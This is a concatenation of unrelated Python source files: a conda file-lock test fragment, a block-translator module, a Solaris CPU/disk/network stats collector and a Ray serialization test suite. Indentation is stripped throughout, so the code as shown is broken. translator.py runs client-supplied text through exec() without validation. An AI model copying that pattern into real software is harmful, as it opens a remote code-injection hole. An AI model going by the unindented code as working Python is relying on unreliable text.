from conda._vendor.auxlib.compat import Utf8NamedTemporaryFile
from conda.common.compat import text_type
with Utf8NamedTemporaryFile(mode='r') as f:
if not isinstance(f.name, text_type):
return
with FileLock(f.name) as lock:
path = basename(lock.lock_file_path)
assert not exists(join(f.name, path))
|
translator.py
|
import re
import threading
def parse_text(session, args):
print(threading.current_thread(), 'parse_text')
print(threading.enumerate(), 'parse_text')
bytes_list = args[0].split(',')
bytes_array = bytearray([int(i) for i in bytes_list]).decode()
sentences = bytes_array.split('\n')
var_dict = dict()
executable_file = ''
for i in range(3):
try:result_apis = re.findall("^(.*) += *(.*)\('(.*)'\)", sentences[i])[0]
except:break
if result_apis[1] == 'GetModel3D':
model_name = [result_apis[0], result_apis[2]]
elif result_apis[1] == 'GetSimulation':
simulation_name = [result_apis[0], result_apis[2]]
in_block=False
blocks = list()
session.blocks = blocks
for i in range(3,len(sentences)):
sentence = sentences[i]
server_result = re.findall("(\t*)(.*) \((.*)\) {}".format('{'), sentence)
if len(server_result)>0:
in_block = True
sentences_block = ''
current_args = ''
current_sep = server_result[0][0]
if server_result[0][1]==model_name[0]:
current_block = Block('model3D', model_name[1], session, blocks)
elif server_result[0][1]==simulation_name[0]:
current_block = Block('CFD', simulation_name[1],session, blocks)
if len(server_result[0][2].split(','))>0:
current_args = server_result[0][2]
current_block.set_args(current_args)
current_block.return_string = ''
current_block.return_values = ''
continue
if re.search(".*}.*", sentence):
in_block=False
current_block.set_string(sentences_block)
blocks.append(current_block)
index = blocks.index(current_block)
executable_file += current_sep + current_block.return_string + "blocks[{}]({})\n".format(index, current_args)
continue
elif re.search('.*return \((.*)\)',sentence):
current_block.return_values = re.findall('.*return \((.*)\)', sentence)[0]
current_block.return_string = re.findall('.*return \((.*)\)', sentence)[0]+"," + " = "
continue
if in_block:
sentences_block += sentence+'\n'
continue
executable_file += sentence + "\n"
print(threading.enumerate(), '...-.-.-.-.-..-.-.-.-.-...-.-')
t = threading.Thread(target=run_exec, name='Execute',args=(executable_file,blocks))
t.start()
def run_exec(executable_file, blocks):
blocks = blocks
print('____________________________-')
print(executable_file)
print('----------------------------')
print(threading.enumerate(), 'before compile')
exec(compile(executable_file, '<string>', 'exec'))
print(threading.enumerate(), 'after compile')
class Block(object):
def __init__(self, server, API, session, blocks_list):
self.server = server
self.API = API
self.session = session
self.blocks_list = blocks_list
def set_string(self, string):
self.block_string = string
def set_args(self, args):
self.args = args
def __call__(self, *args):
self.run_thread(*args)
self.flag = True
while self.flag:
import time
time.sleep(5)
print('Waiting',self.blocks_list.index(self))
print(self.flag)
pass
return self.return_values
def run_thread(self, *args):
var_dict = dict()
index = self.blocks_list.index(self)
if len(args)>0:
args_name = self.args.split(',')
for i in range(len(args_name)):
if isinstance(args[i], str):
var_dict['{}'.format(args_name[i])] = "'" + args[i] + "'"
else:
var_dict['{}'.format(args_name[i])] = args[i]
var_dict['return_values'] = self.return_values
var_dict['index'] = index
var_dict['receiver'] = 'handler'
self.session.__getattribute__('socket_{}'.format(self.server)).send('superEditor', {
'execute_block': [self.block_string, var_dict]})
def response_blocks(session, args):
session.blocks[args[0]].return_values = args[1::]
session.blocks[args[0]].flag = False
class Model3DVar(object):
def __init__(self, session, API):
self.session = session
self.API = API
class SimulationVar(object):
def __init__(self, session, API):
self.session = session
self.API = API
|
capture_from_local-s11_4.py
|
#!/usr/bin/python
import os
import sys
import time
import json
import string
import socket
import subprocess
import multiprocessing
from multiprocessing import Process
import psutil as ps
from pprint import pprint
from libsstore import SStore
from urlparse import urlparse
from functools import partial
from urllib2 import Request, urlopen, URLError
hostname = socket.gethostname()
def qryTime():
start_time = int(time.time())
subprocess.call(['/opt/sys_monitor/conf/test_db1_apps.sh', hostname], stdout=subprocess.PIPE, shell=False, stderr=subprocess.PIPE)
time.sleep(5)
end_time = int(time.time())
date_time = end_time
db1_qry = end_time - start_time
if db1_qry < 3:
time.sleep(60)
statsData = {"db1.qry-time": db1_qry}
#print statsData
updateSstore(statsData)
def statTime():
disks1 = ps.disk_io_counters(perdisk=True)
dsk1_0b = disks1["sd1"]
dsk1_0c = disks1["sd3"]
net1 = ps.net_io_counters(pernic=True)
net1_all = net1["net0"]
time.sleep(2)
date_time = int(time.time())
cpu = ps.cpu_times_percent()
mem = ps.virtual_memory()
swap = ps.swap_memory()
disks2 = ps.disk_io_counters(perdisk=True)
net2 = ps.net_io_counters(pernic=True)
cpu_usr = int(round(cpu[0],3))
cpu_sys = int(round(cpu[1],3))
cpu_tot = int(round(cpu[0] + cpu[1],3))
# Conversion below - (0, 'B'), (10, 'KB'),(20, 'MB'),(30, 'GB'),(40, 'TB'), (50, 'PB')
mem_usd = int(round(mem[3] / 2 ** 20))
mem_tot = int(round(mem[0] / 2 ** 20))
swp_usd = int(round(swap[1] / 2 ** 20))
swp_tot = int(round(swap[0] / 2 ** 20))
dsk2_0b = disks2["sd1"]
dsk2_0c = disks2["sd3"]
dsk_0b_rop = (dsk2_0b[0] - dsk1_0b[0])
dsk_0b_wop = (dsk2_0b[1] - dsk1_0b[1])
dsk_0b_rmb = (dsk2_0b[2] - dsk1_0b[2]) / 1024 / 1024
dsk_0b_wmb = (dsk2_0b[3] - dsk1_0b[3]) / 1024 / 1024
dsk_0b_rtm = (dsk2_0b[4] - dsk1_0b[4])
dsk_0b_wtm = (dsk2_0b[5] - dsk1_0b[5])
dsk_0c_rop = (dsk2_0c[0] - dsk1_0c[0])
dsk_0c_wop = (dsk2_0c[1] - dsk1_0c[1])
dsk_0c_rmb = (dsk2_0c[2] - dsk1_0c[2]) / 1024 / 1024
dsk_0c_wmb = (dsk2_0c[3] - dsk1_0c[3]) / 1024 / 1024
dsk_0c_rtm = (dsk2_0c[4] - dsk1_0c[4])
dsk_0c_wtm = (dsk2_0c[5] - dsk1_0c[5])
net2_all = net2["localnet0"]
net_smb = (net2_all[0] - net1_all[0]) / 1024 / 1024 / 2
net_rmb = (net2_all[1] - net1_all[1]) / 1024 / 1024 / 2
ses_c = subprocess.Popen(['/opt/sys_monitor/conf/chk_db1_apps-ses.sh', hostname], stdout=subprocess.PIPE, shell=False, stderr=subprocess.PIPE)
stdout = ses_c.communicate()[0]
db1_ses = filter(type(stdout).isdigit, stdout)
statsData = {
"date_time": date_time,
"cpu.usage-sys": cpu_sys,
"cpu.usage-usr": cpu_usr,
"cpu.usage-total": cpu_tot,
"memory-used": mem_usd,
"memory-total": mem_tot,
"swap-used": swp_usd,
"swap-total": swp_tot,
"net.in-megabytes": net_rmb,
"net.out-megabytes": net_smb,
"disk.read-megabytes-0B": dsk_0b_rmb,
"disk.write-megabytes-0B": dsk_0b_wmb,
"disk.read-ops-0B": dsk_0b_rop,
"disk.write-ops-0B": dsk_0b_wop,
"disk.read_wait-time-0B": dsk_0b_rtm,
"disk.write_wait-time-0B": dsk_0b_wtm,
"disk.read-megabytes-0C": dsk_0c_rmb,
"disk.write-megabytes-0C": dsk_0c_wmb,
"disk.read-ops-0C": dsk_0c_rop,
"disk.write-ops-0C": dsk_0c_wop,
"disk.read_wait-time-0C": dsk_0c_rtm,
"disk.write_wait-time-0C": dsk_0c_wtm,
"db1.ses-count": int(db1_ses),
"db1.date_gen": date_time
}
#print statsData
updateSstore(statsData)
def createSstore():
# Sleep at first to start stats
time.sleep(1)
try:
# Ssids list
ssids = [
'//:class.app/company/servers//:res.server/' + hostname
]
#print ssids
# Get an instance of SStore class
ss = SStore()
# Add resources
ss.resource_add(ssids)
except (KeyboardInterrupt, SystemExit):
print "Caught KeyboardInterrupt, terminating workers"
p.terminate()
p.join()
sys.exit(1)
def updateSstore(statsData):
try:
ssidStats = {}
for key, val in statsData.iteritems() :
ssidStats["//:class.app/company/servers//:res.server/" + hostname + "//:stat." + key] = val
# Get an instance of SStore class
ss = SStore()
# enable persistent recording of the collection
ss.enabled = True
try:
#print ssidStats
ss.data_update(ssidStats)
except:
print("Failed to update stats because {0}".format(ss.err_description))
exit(1)
# Check for warnings
for w in ss.warnings():
print("Failed to update stat {0} because {1}".format(w.id, w.description))
#print ssidStats, hostname
time.sleep(2)
except (KeyboardInterrupt, SystemExit):
print "Caught KeyboardInterrupt, terminating workers"
p.terminate()
p.join()
sys.exit(1)
def chkDb():
while True:
qryTime()
def chkStats():
while True:
statTime()
if __name__=='__main__':
createSstore()
p1 = Process(target = chkStats)
p1.start()
p2 = Process(target = chkDb)
p2.start()
|
runtest.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import os
import re
import setproctitle
import string
import subprocess
import sys
import threading
import time
from collections import defaultdict, namedtuple, OrderedDict
import numpy as np
import pytest
import ray
import ray.ray_constants as ray_constants
import ray.test.cluster_utils
import ray.test.test_utils
logger = logging.getLogger(__name__)
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different.".format(
obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
}
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3])
]
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = (
[{
obj: obj
} for obj in PRIMITIVE_OBJECTS
if (obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS
@pytest.fixture
def ray_start():
# Start the Ray processes.
ray.init(num_cpus=1)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_passing_arguments_by_value(ray_start):
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
def test_ray_recursive_objects(ray_start):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
with pytest.raises(ray.raylet.common_error):
ray.put(f)
def test_python_workers(shutdown_only):
# Test the codepath for starting workers from the Python script,
# instead of the local scheduler. This codepath is for debugging
# purposes only.
num_workers = 4
ray.worker._init(
num_cpus=num_workers,
start_workers_from_local_scheduler=False,
start_ray_local=True)
@ray.remote
def f(x):
return x
values = ray.get([f.remote(1) for i in range(num_workers * 2)])
assert values == [1] * (num_workers * 2)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(shutdown_only):
ray.init(num_cpus=1)
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(shutdown_only):
ray.init(num_cpus=2)
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test subtypes of dictionaries.
value_before = OrderedDict([("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: [], [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
# Test returning custom classes created on workers.
@ray.remote
def g():
return SubQux(), Qux()
subqux, qux = ray.get(g.remote())
assert subqux.objs[2].foo.value == 0
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(shutdown_only):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
ray.init(num_cpus=1)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
@ray.remote
def no_op():
pass
self.init_ray()
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert_equal(ray.get(h.remote()), np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=1, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(
args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=50)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(shutdown_only):
ray.init(num_cpus=1)
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1750, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5000)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(shutdown_only):
ray.init(num_cpus=1)
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
